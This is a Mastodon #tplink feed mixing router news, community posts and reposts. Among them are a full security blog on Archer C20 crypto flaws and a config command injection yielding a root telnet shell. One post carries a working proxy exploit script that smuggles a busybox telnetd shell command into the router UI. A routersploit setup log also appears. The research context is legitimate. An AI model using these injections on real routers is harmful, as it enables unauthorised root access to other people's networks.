Mastodawn

🚨 TP-Link zero-day flaw enables RCE with root on millions of routers

⚠️ Affects Archer AX10, AX1500 + more
📡 4,247 devices exposed online
❌ Still no patch since May 2024

https://www.technadu.com/critical-tp-link-zero-day-vulnerability-exposes-millions-of-routers-to-full-system-takeover/607866/

#CyberSecurity #ZeroDay #TPLink

Offensive Sequence 1d ago

🚨 TP-Link Archer AX10/AX1500 routers (FW 1.3.2–1.3.10) hit by zero-day stack overflow in CWMP—remote code execution possible via malicious TR-069 server URL. 4,247+ devices online. Patch & lock down configs! https://radar.offseq.com/threat/zero-day-alert-automated-discovery-of-critical-cwm-d9ff5f58 #OffSeq #TPLink #ZeroDay #RCE

m0veax 4d ago

I love that a small community gathered around the tplink-m7350. Everyone tries different things, people support each other exploring, gathered knowledge gets documented in the repository <3

If you have a device at home, checkout our repository or join our matrix channel.

https://github.com/m0veax/tplink_m7350

#tplink #opensource

GitHub - m0veax/tplink_m7350 at fbdemo-colors

Exploring the TP-Link M7350. Contribute to m0veax/tplink_m7350 development by creating an account on GitHub.

GitHub

Agnieszka Serafinowicz Aug 26

TP-Link wprowadza switche przemysłowe. Nowa seria Omada do pracy w ekstremalnych warunkach

Firma TP-Link rozszerzyła swoje portfolio o serię przemysłowych przełączników sieciowych Omada Industrial Easy Managed.

Cztery nowe modele – IES210GPP, IES206GPP, IES208G oraz IES206G – zostały zaprojektowane do pracy w trudnych warunkach, takich jak hale produkcyjne, chłodnie czy tunele, oferując jednocześnie centralne zarządzanie w chmurze.

Kluczową cechą nowej serii jest jej wytrzymałość. Wszystkie przełączniki zamknięto w aluminiowych obudowach o klasie szczelności IP40, przystosowanych do montażu na szynie DIN lub na ścianie. Urządzenia mogą pracować w ekstremalnych temperaturach, od -40°C do +75°C, i są wyposażone w zabezpieczenia przeciwprzepięciowe do 6 kV oraz redundantne wejście zasilania, co gwarantuje ciągłość pracy w razie awarii. Brak wentylatora zwiększa niezawodność, eliminując ryzyko awarii mechanicznych.

Dwa z czterech nowych modeli oferują zasilanie Power over Ethernet. Najbardziej zaawansowany, IES210GPP, dysponuje budżetem mocy 240 W i oferuje 6 portów PoE+ oraz 2 porty PoE++, zdolne zasilać urządzenia o mocy do 60 W każdy, takie jak kamery PTZ czy punkty dostępowe. Model IES206GPP to bardziej kompaktowe rozwiązanie z budżetem mocy 120 W. Pozostałe dwa przełączniki, IES208G i IES206G, są pozbawione funkcji PoE i koncentrują się na stabilnej transmisji danych.

Wszystkie nowe switche są w pełni zintegrowane z platformą Omada SDN (Software Defined Networking). Pozwala to administratorom na centralne, zdalne zarządzanie całą infrastrukturą sieciową z poziomu chmury – przez przeglądarkę internetową lub dedykowaną aplikację mobilną. Umożliwia to pełną kontrolę nad siecią z dowolnego miejsca na świecie.

Nowe przełączniki są już dostępne w sprzedaży i objęte 5-letnią gwarancją producenta. Ich orientacyjne ceny wynoszą: IES210GPP – 900 zł, IES206GPP – 770 zł, IES208G – 700 zł, a IES206G – 660 zł.

#news #Omada #OmadaSDN #PoE #Polska #przełącznik #siećLAN #siećPrzemysłowa #switch #switchPrzemysłowy #TPLINK

finster Aug 23

#tplink Status ->
"IPv6-Übergangslösung: Doppelter Stapel"

❀𝓪𝓵𝓬𝓮𝓪𖤐 Aug 23

#tplink #security

[PSA] Newer TP-Link Routers send ALL your web traffic to 3rd party servers...
recently enabled a DNS gateway to be able to see requests from my router, and network devices. Was surprised to find 80K + requests (in 24 hours) out to an Avira "Safe Things" subdomains *.safethings.avira.com (far more than any other server).

Digging into this more, I found that it is related to the built-in router security "Home Shield" that ships with newer TP-Link routers - https://oem.avira.com/en/solutions/safethings-for-router-manufacturers

Here is the kicker though, I have the Avira / Home Shield services completely turned off (I wasn't even subscribed to their paid service for it). The router doesn't care, and sends ALL your traffic to be "analyzed" anyhow. See this response from TP Link (towards bottom of review) from last year - https://www.xda-developers.com/tp-link-deco-x68-review/#:~:text=TP%2DLink%20says%20the%20network%20activity

#Dystopian ...

#router

Are we doing #tuya 2.0 ???
#repost •acws #acws

Download Security Software for Windows, Mac, Android & iOS | Avira Antivirus

Discover a range of award-winning security, privacy & performance tools for all devices • Antivirus • VPN • System Speedup • Mobile & more. Download now

Avira

❀𝓪𝓵𝓬𝓮𝓪𖤐 Aug 23

I didn’t choose grep. grep chose me
Let’s grep for the qcmap_webclient_cgi_file file. Another process will likely be listening to this file. God I love grep.

$ grep -r qcmap_webclient_cgi_file
Binary file data/bin/QCMAP_Web_CLIENT matches
Binary file system/WEBSERVER/www/cgi-bin/qcmap_web_cgi matches

That was actually quite fun to read
#ghidra #tplink #webserver #vulnerability

(Current status:
Got #Fastboot working. Thats it. haha)

https://www.pentestpartners.com/security-blog/cve-2019-12103-analysis-of-a-pre-auth-rce-on-the-tp-link-m7350-with-ghidra/
#repost •acws #acws

CVE-2019-12103 – Analysis of a Pre-Auth RCE on the TP-Link M7350, with Ghidra! | Pen Test Partners

TL;DR The TP-Link M7350 (V3) is affected by a pre-authentication (CVE-2019-12103), and a few post-authentication (CVE-2019-12104) command injection vulnerabilities. These injections can be exploited remotely, if the attacker is on the same LAN or otherwise able to get access to the router web interface. CVE-2019-12103 can also be exploited in any browser by cross-site request […]

Pen Test Partners

❀𝓪𝓵𝓬𝓮𝓪𖤐 Aug 23

3) Exhausting system memory before /cgi/getParm was requested, causing the router to default to hardcoded RSA keys

Wow the #poor #router !

I wouldn't want anyone to exhaust my systemmem till I fall back on my default #RSA keys
https://hex.fish/2021/05/10/tp-link-gdpr/

Oh wait.
I'm not a router

#repost •acws #acws #tplink #cryptography

TP-Link's Attempt at GDPR Compliance

TL;DR The TP-Link developers created a /cgi_gdpr endpoint to support various encrypted requests to comply by the EU’s GDPR. Several issues were found while auditing the authentication protocol and implementation, some of which are easily exploitable. The AES key and IV used to encrypt the username and password at login are almost entirely generated from the current time. This allows a passive MitM to brute force decrypt the login requests in seconds. I’ve written a Scapy script that will parse a PCAP to find a login request and brute force decrypt it [link]. On the first request to the /cgi/getParm endpoint, the web server generates an RSA public/private key-pair. If any of the memory allocations for the keys fail, hardcoded keys will be used as a fallback. The server uses RSA without padding which makes the encryption deterministic. Given the deterministic RSA encrypt and TP-Link’s authentication implementation, attackers can crack the login password offline. I’ve written a PoC on GitHub that demonstrates offline password cracking [link]. The server requires a server issued sequence field to be included in the RSA encrypt functions to prevent replay attacks. The sequence can be modified based on the data length provided, which can be easily modified without affecting the data decryption and enable a replay attack of a previous login request. Assuming one of the listed vulnerabilities were exploited to expose login credentials, a 3-year-old unpatched post-auth command injection exploit was used to gain telnet access, as the root user, to the fully patched Archer C20. Background I was bored during the COVID-19 lockdown, so I started bug hunting on the cheapest router I could find at Micro Center, the TP-Link Archer C20. This router was the ideal target because it’s cheap and has a rather large attack surface compared to other $35 IoT devices. I played around with the web UI while Wireshark captured the network traffic. While reviewing the PCAP, I noticed that many of the requests, excluding requests for static files, were encrypted. Each encrypted request was sent to the /cgi_gdpr endpoint. The General Data Protection Regulation (GDPR) defines some legal standards for protecting users’ privacy in the EU with respect to technology. TP-Link probably added this to comply with GDPR, hence /cgi_gdpr. The firmware changelog for the Archer C20 mentions modifying the login mode “as required by law” which further supports this assumption [link] [archive]. Before I started looking for memory corruption bugs, I needed to understand the new encryption scheme. Authentication Protocol From the perspective of a passive network observer, a client authenticates with the router through two HTTP endpoints: /cgi/getParm and /cgi_gdpr. The web server’s RSA public key’s e and n values are retrieved via an HTTP GET request to the /cgi/getParm endpoint. The response also includes a server generated sequence, which will later be used as RSA encryption entropy. An AES-128 key and IV are generated client-side, which will be used to encrypt all request payloads sent to the /cgi_gdpr endpoint. Requests to /cgi_gdpr are composed of two fields: sign and data. The encryption and encoding scheme for both fields is defined below. sign=base64_encode(rsa_encrypt(key=<aes_key>&iv=<cbc_iv>&h=<username_and_passwd_hash>&s=<sequence_plus_data_len>)) data=base64_encode(aes_encrypt(payload)) The data field contains a PKCS #7 padded payload that is AES-128 CBC encrypted using the newly generated AES key and IV. The data field’s payload is in a janky INI format containing the HTTP endpoint, request configuration, and the request data. During authentication, the /cgi_gdpr request’s data field payload is referred to as the login message. An example of a login message is shown below. 8 [/cgi/login#0,0,0,0,0,0#0,0,0,0,0,0]0,2 username=admin password=password123 The login message sets the HTTP endpoint to /cgi/login and the request data to the credentials in plaintext. The web interface only accepts a password and hardcodes the username to admin. A /cgi_gdpr request’s sign field contains the the newly generated AES key and IV, a MD5 hash of the username concatenated with the password, and the sequence from the /get/Parm request. The sign field is RSA encrypted using the public key retrieved from the /cgi/getParm request. Both data and sign fields are Base64 encoded then sent to the web server’s /cgi_gdpr endpoint via an HTTP POST request. The server uses its private key to decrypt the sign field. It verifies that the sequence number in the sign field is equal to the server generated sequence number plus the length of the request’s Base64 encoded data field. The server then retrieves the AES key and IV and uses them to decrypt the data field. The decrypted data field is parsed and sent to the /cgi/login endpoint’s handler function. The handler verifies that the username and password specified in the login message match the previously configured username and password. If the credentials are valid the server returns a HTTP OK. I’ve written a script that automates authentication [link]. AES Key Entropy Source During authentication, the client generates an AES key and IV to encrypt the /cgi_gdpr request’s data field. Let’s take a look at the function that generates the keys. It’s clearly not using cryptographically strong random values from a crypto API [link], but it gets worse. The + "" + is forcing string concatenation, not arithmetic addition. This means that if the getTime return value is large enough, the remaining entropy can be ignored. The documentation for the getTime method states that it returns the milliseconds since Unix Epoch [link]. If I were to generate a timestamp as of writing this blog post, it would return 1618861383008, which is 13 characters long. This 13 character number is cast to a decimal string representation, concatenated with a Math.random() value, then truncated to fit into KEY_LEN or IV_LEN which are 16 bytes long. Since the timestamp is 13 characters, it occupies 13 of the 16 bytes of the key! A passive MitM could observe a login request and easily brute force the remaining 3 bytes of entropy to decrypt the login message. The time of the key generation will be slightly before the time it’s observed over the network, but brute forcing up to a second before a given observation time will still only take seconds. The AES key and IV are generated at different times and have different 3 bytes of entropy. The naïve approach is to brute force the key and IV with O(n2) time complexity. For each AES key brute force attempt, run another brute force routine for the IV. There’s a faster O(n) solution if we consider how CBC decryption works. The first block of ciphertext c0 is decrypted into an intermediary value c0′. The c0′ value must be XORed with the IV before revealing the plaintext. After viewing several different login messages, you should notice that the first 16 bytes (AES block size) are always the same: 8\r\n[/cgi/login#0. If we take this known plaintext value and XOR it with c0′, it’ll reveal the IV. If the top 10 bytes of the calculated IV match the top 10 bytes of the brute forced key, which are the Unix Epoch timestamps down to the second, both the AES key and IV have been found. Using this method, an attacker only needs to brute force the AES key space in O(n) time because the IV check can be done in a constant O(1) check. I’ve written a Scapy script that parses a PCAP to find the login request, gets the packet timestamp, and then cracks the AES key and IV to reveal the credentials in plaintext [link]. Default RSA Key The RSA public/private key-pair are generated on the first /cgi/getParm request. The http_rsa_getPubKey function calls generate_rsa_private_key if the global RSA n value has not been generated yet. This generate_rsa_private_key function allocates buffers for the RSA n, e, and d hex strings. If any hex string malloc fails, -1 is returned. In http_rsa_getPubKey, if -1 is returned from generate_rsa_private_key it will fallback to hardcoded values in the .data section. Ideally, an attacker would attempt to control the size of the malloc but it’s hardcoded to a relatively small value. Given this constraint, an attacker can still cause the default keys to be used given two conditions: 1) Remotely control when a buffer is malloced and free across any service on the router (e.g. UPnP, HTTP, CWMP, SSH) 2) The /cgi/getParm endpoint has not been requested since the device booted Assuming an attacker satisfies both requirements, they could put the router into a state that would cause subsequent mallocs to fail by issuing many requests that call malloc without freeing until a later time. The attacker would then make a request to the /cgi/getParm endpoint and cause the device to set the global public/private key-pair to the known default keys. These hardcoded keys would persist until the device is rebooted. The attacker would free the previously allocated buffers, restoring the router to state where mallocs succeed. Now whenever a legitimate user authenticates with the router, the attacker could decrypt the sign field and expose the AES key and IV. The key and IV would then be used to decrypt the data field and expose the login credentials in plaintext. RSA without Padding The sign field of the /cgi_gdpr requests use RSA without padding so the ciphertext is deterministic. This means that every time a static message is encrypted by the same RSA public key, it produces the same ciphertext. msg = "Hello, World!" if rsa_encrypt(msg) == rsa_encrypt(msg): print("It's deterministic") Given TP-Link’s authentication implementation and deterministic RSA, an attacker can ultimately create an offline password cracker without ever seeing the authentication hash. RSA can only encrypt a relatively small input, e.g. 128 byte input, excluding padding, for a 1024-bit key. TP-Link encrypts larger messages by breaking the input into 64 byte blocks and padding the last block with null bytes. Let’s look at an example of an /cgi_gdpr request’s sign field. key=1617857002547232&iv=1617857002547416&h=bb0f7e021d52a4e31613d463fc0525d8&s=271058692 The key and IV will always be 16 characters long because each character is a byte and the AES block size is 16 bytes. The authentication hash will always be 32 characters long because it’s a MD5 hex string, where each character represents 4 bits of the 16 byte hash. The sequence can vary slightly in length, but it’s known to a passive observer. TP-Link would break this example into into 64 byte blocks like so: rsa_blocks[0] = "key=1617857002547232&iv=1617857002547416&h=bb0f7e021d52a4e31613d" rsa_blocks[1] = "463fc0525d8&s=271058692" An attacker could not feasibly attempt offline hash cracking on the first block unless they know the key and IV. The second block is a different case because it only contains part of the authentication hash and the sequence. The sequence field can be calculated by a passive observer: the sequence value returned by the previous /cgi/getParm request plus the length of the Base64 encoded data field from the /cgi_gdpr request. This means the attacker would only be guessing at the last 44 bits of the MD5 hash which is perfect for offline hash cracking. An attacker would know that they’ve cracked the password when the ciphertext produced by their guess matches the ciphertext from the original sign field. # The sign field is a hex string. 128 characters in a hex string is 64 bytes. second_block = sign_field[128:] if second_block == rsa_encrypt(md5("admin" + <password_guess>)[-11:] + "&s=" + sequence): print("We've probably cracked the password!") The admin string comes from the hardcoded username, described in the authentication protocol section. I’ve written an offline password cracker proof of concept for this example [link]. Replay Attack When /getParm is requested, a new global sequence number is generated server-side by taking a random 4 byte value, from /dev/urandom, modulo 0x40000000. The sequence number is returned to the client with the RSA e and n values. The client must put the sequence field in every /cgi_gdpr request’s sign field to add entropy to the RSA encryption. When the user attempts a login, it will recalculate the sequence number: the server’s global sequence value plus the length of the Base64 encoded data field which is calculated by strlen. An attacker can modify the sequence value by increasing the length of the Base64 encoded data. Adding bytes to encoded and encrypted data can lead to data corruption which will cause the decode or decrypt to fail. Additionally, given the replay attack model, an attacker does not have the key to legitimately increase the data length. Luckily, TP-Link implemented their own Base64 decode which recalculates the string length. As shown in the decompiled snippet from Ghidra, it truncates the string by either the min value of strlen or the first space character it sees (hex character 0x20). An attacker could keep requesting /cgi/getParm until the value of a newly generated sequence number is slightly less than the value of the previous sequence number. The attacker could then send the previous login request from a legitimate user with the same sign and data fields, but add space characters after the Base64 data until the sequence number matches the previous sequence number. The router will call strlen on the Base64 data and add it to the server’s global sequence number to calculate the expected sequence number. The web server will RSA decrypt the sign field and verify the authentication hash (which the attacker still does not know) and the sequence field. Both checks will succeed. When the server later Base64 decodes the data field, it will ignore the space characters used to increase the data length and sequence value. Padding Oracle The aes_tmp_decrypt_buf_nopadding_new function in libgdpr.so is used to decrypt /cgi_gdpr requests’ payload. It calls the remove_padding function which returns the number of padding bytes. The web client uses PKCS #7 padding, which repeats the number of padding bytes as padding (e.g. 7 padding bytes would be \x07\x07\x07\x07\x07\x07\x07). The function gets the last byte, ensures it’s less than or equal to the block size, then returns it. If the function fails the block size check, it will return -1. The remove_padding function does not verify that the previous padding bytes are equal to the value of the last byte which is an implementation error but is not exploitable. If remove_padding fails, the server will not return a unique failure to the client (i.e. no oracle) and will fail later during parsing. Ignoring the padding error mitigates padding oracle attacks. I was impressed that the developers got this right because it’s a tricky one to remember! We have creds! Now what? Let’s assume an attacker now has the login credentials by leveraging one of the three vulnerabilities described above: 1) Brute forcing the AES key and IV based on the time the login request was sent 2) Hash cracking the password in the sign field of the /cgi_gdpr request 3) Exhausting system memory before /cgi/getParm was requested, causing the router to default to hardcoded RSA keys Our attack surface has vastly increased because post-auth request handlers are now reachable. After playing around with the web interface for a bit, I found that the router allows users to backup and restore their device configuration. The configuration restore is an interesting attack surface because the web server will have to parse a lot of attacker controlled data. I backed up my current device config to see how the file is formatted, but it was encrypted. To understand how the config was encrypted, I looked at the web server’s handler function for the /cgi/confencode endpoint. The handler function used DES encryption with a hardcoded key in libcmm.so. Using this key, we can decrypt the config file and see the giant XML config. I wanted to see if I was the only researcher who was looking at this attack surface, so I Googled the hardcoded key. It turns out that I wasn’t alone. The tpconf_bin_xml GitHub repository handles the encryption/decryption and compression/decompression of TP-Link config files [link]. It also describes a command injection vulnerability found in the Description field in the DeviceInfo section. It was developed for the TP-Link TD-W9970, but I gave it a try on the Archer C20 and it worked! # Downloaded the current config as ArcherC20V520121442010n.bin python3 tpconf_bin_xml.py -l ArcherC20V520121442010n.bin ArcherC20V520121442010n.xml # Added the command injection to the decrypted config file. # # Before: # # <Description val="AC750 Wireless Dual Band Router " /> # # # After # # <Description val="AC750 Wireless Dual Band Router`telnetd -p 1023 -l login` " /> python3 tpconf_bin_xml.py -l ArcherC20V520121442010n.xml ArcherC20V520121442010n.payload.bin # Then using the web interface, restore the ArcherC20V520121442010n.payload.bin config # Username: admin # Password: 1234 telnet 192.168.0.1 1023 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. Archer C20 login: admin Password: ~ # Now we have a remote root shell! It’s pretty depressing that this n-day has been on GitHub for three years and still isn’t patched on firmware that was updated on 1/27/2021. I hope TP-Link eventually gets around to patching it across any or all device models. Security Recommendations Use cryptographically strong entropy from a crypto API when generating AES keys Generate the RSA public/private key-pair during the web server initialization on boot. If any malloc in generate_rsa_private_key fails, consider it an unrecoverable error and force the web server to exit. Use PKCS #1 padding when using RSA Do not modify the sequence entropy value to mitigate replay attacks Patch open source n-days

Hex Fish's Blog

Show thread

❀𝓪𝓵𝓬𝓮𝓪𖤐 Aug 23

@alcea •acws #acws
Hmm

https://ibb.co/C3MKGp18
https://i.ibb.co/KpLxvc0h/Screenshot-2025-08-23-12-38-19.jpg

test.sh
--
#!/bin/bash
set -e

read -p "Enter the target IP: " TARGET_IP
PORT="4000"

# Use Windows TEMP directory
PYTHON_FILE="${TEMP}/exploit_proxy.py"

echo "[*] Starting exploit proxy server for target $TARGET_IP..."

cleanup() {
echo "[*] Cleaning up..."
rm -f "$PYTHON_FILE"
echo "[*] Done."
}
trap cleanup EXIT

cat <"$PYTHON_FILE"
from flask import Flask, request, Response
app = Flask(__name__)

INJECT = br''';window.telnetPoll = window.setInterval(() => {
Globals.models.PTModel.add({
applicationName: "telnet",
enableState: 1,
entryId: 1,
openPort: "2300-2400",
openProtocol: "TCP",
triggerPort: "\\\$(busybox telnetd -l /bin/sh)",
triggerProtocol: "TCP"
});
alert("Success! You can telnet to the router.");
window.clearInterval(window.telnetPoll);
}, 1000);'''

@app.route('/', methods=["GET", "POST"])
@app.route('/', methods=["GET", "POST"])
def proxy(path=""):
import requests
url = f"http://${TARGET_IP}/" + path
if request.query_string:
url += "?" + request.query_string.decode()

headers = dict(request.headers)
headers.pop('Host', None)

resp = requests.request(
method=request.method,
url=url,
headers=headers,
data=request.get_data(),
cookies=request.cookies,
allow_redirects=False,
)

content = resp.content
if path == "js/settings.min.js":
content += INJECT
headers = dict(resp.headers)
headers.pop('Content-Length', None)
return Response(content, headers=headers, status=resp.status_code)

return Response(content, headers=dict(resp.headers), status=resp.status_code)

app.run(host='127.0.0.1', port=${PORT})
EOF

echo "[*] Local proxy listening on http://127.0.0.1:${PORT}"
echo "[*] Open this URL in your browser and log in to the router UI"
echo "[*] Once the exploit is injected, telnet should be enabled on ${TARGET_IP}:23"

# Use Python 3 from PATH or Windows py launcher
if command -v python3 &>/dev/null; then
python3 "$PYTHON_FILE"
elif command -v py &>/dev/null; then
py -3 "$PYTHON_FILE"
else
echo "Python 3 is not installed or not in PATH!"
exit 1
fi

bat.bat
--
@echo off
"C:\Program Files\Git\bin\bash.exe" "test.sh"
pause

https://github.com/m0veax/tplink_m7350/blob/main/open-v5.sh

127.0.0.1:4000 is sucha goofball adresss

#TPLink

Screenshot-2025-08-23-12-38-19

ImgBB

❀𝓪𝓵𝓬𝓮𝓪𖤐 Aug 23

It's a good #saturday for trying to hack our #TPLink Router

(base) C:\Users\User\routersploit>python -m pip install requests paramiko pysnmp pycryptodome
Requirement already satisfied: requests in c:\users\user\anaconda3\lib\site-packages (2.32.2)
Requirement already satisfied: paramiko in c:\users\user\anaconda3\lib\site-packages (2.8.1)
Collecting pysnmp
Using cached pysnmp-7.1.21-py3-none-any.whl.metadata (5.1 kB)
Requirement already satisfied: pycryptodome in c:\users\user\anaconda3\lib\site-packages (3.23.0)
Requirement already satisfied: charset-normalizer<4,>=2 in c:\users\user\anaconda3\lib\site-packages (from requests) (2.0.4)
Requirement already satisfied: idna<4,>=2.5 in c:\users\user\anaconda3\lib\site-packages (from requests) (3.7)
Requirement already satisfied: urllib3<3,>=1.21.1 in c:\users\user\anaconda3\lib\site-packages (from requests) (2.2.2)
Requirement already satisfied: certifi>=2017.4.17 in c:\users\user\anaconda3\lib\site-packages (from requests) (2024.6.2)
Requirement already satisfied: bcrypt>=3.1.3 in c:\users\user\anaconda3\lib\site-packages (from paramiko) (3.2.0)
Requirement already satisfied: cryptography>=2.5 in c:\users\user\anaconda3\lib\site-packages (from paramiko) (42.0.5)
Requirement already satisfied: pynacl>=1.0.1 in c:\users\user\anaconda3\lib\site-packages (from paramiko) (1.5.0)
Requirement already satisfied: pyasn1!=0.5.0,>=0.4.8 in c:\users\user\anaconda3\lib\site-packages (from pysnmp) (0.4.8)
Requirement already satisfied: cffi>=1.1 in c:\users\user\anaconda3\lib\site-packages (from bcrypt>=3.1.3->paramiko) (1.16.0)
Requirement already satisfied: six>=1.4.1 in c:\users\user\anaconda3\lib\site-packages (from bcrypt>=3.1.3->paramiko) (1.16.0)
Requirement already satisfied: pycparser in c:\users\user\anaconda3\lib\site-packages (from cffi>=1.1->bcrypt>=3.1.3->paramiko) (2.21)
Using cached pysnmp-7.1.21-py3-none-any.whl (343 kB)
Installing collected packages: pysnmp
Successfully installed pysnmp-7.1.21

[notice] A new release of pip is available: 24.1.1 -> 25.2
[notice] To update, run: python.exe -m pip install --upgrade pip

(base) C:\Users\User\routersploit>clear
Der Befehl "clear" ist entweder falsch geschrieben oder
konnte nicht gefunden werden.

(base) C:\Users\User\routersploit>cd routersploit

(base) C:\Users\User\routersploit\routersploit>python rsf.py
python: can't open file 'C:\\Users\\User\\routersploit\\routersploit\\rsf.py': [Errno 2] No such file or directory

(base) C:\Users\User\routersploit\routersploit>cd ..

(base) C:\Users\User\routersploit>python rsf.py
Traceback (most recent call last):
File "C:\Users\User\routersploit\rsf.py", line 9, in
from routersploit.interpreter import RoutersploitInterpreter
File "C:\Users\User\routersploit\routersploit\interpreter.py", line 36, in
import readline
ModuleNotFoundError: No module named 'readline'

(base) C:\Users\User\routersploit>python -m pip install pyreadline3
Collecting pyreadline3
Downloading pyreadline3-3.5.4-py3-none-any.whl.metadata (4.7 kB)
Downloading pyreadline3-3.5.4-py3-none-any.whl (83 kB)
---------------------------------------- 83.2/83.2 kB 4.6 MB/s eta 0:00:00
Installing collected packages: pyreadline3
Successfully installed pyreadline3-3.5.4

[notice] A new release of pip is available: 24.1.1 -> 25.2
[notice] To update, run: python.exe -m pip install --upgrade pip

(base) C:\Users\User\routersploit>python rsf.py
______ _ _____ _ _ _
| ___ \ | | / ___| | | (_) |
| |_/ /___ _ _| |_ ___ _ __\ `--. _ __ | | ___ _| |_
| // _ \| | | | __/ _ \ '__|`--. \ '_ \| |/ _ \| | __|
| |\ \ (_) | |_| | || __/ | /\__/ / |_) | | (_) | | |_
\_| \_\___/ \__,_|\__\___|_| \____/| .__/|_|\___/|_|\__|
| |
Exploitation Framework for |_| by Threat9
Embedded Devices

Codename : I Knew You Were Trouble
Version : 3.4.7
Homepage : https://www.threat9.com - @threatnine

Exploits: 143 Scanners: 4 Creds: 171 Generic: 4 Payloads: 32 Encoders: 6

rsf >

https://github.com/threat9/routersploit/tree/master

Anaconda @ C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Anaconda3 (64-bit)\Anaconda Prompt.lnk

And since I suck at whatever this is, let's use the crowbar

https://ibb.co/N2SrSktn
https://i.ibb.co/HTdCdMBp/Screenshot-2025-08-23-11-59-14.jpg

#repost •acws #acws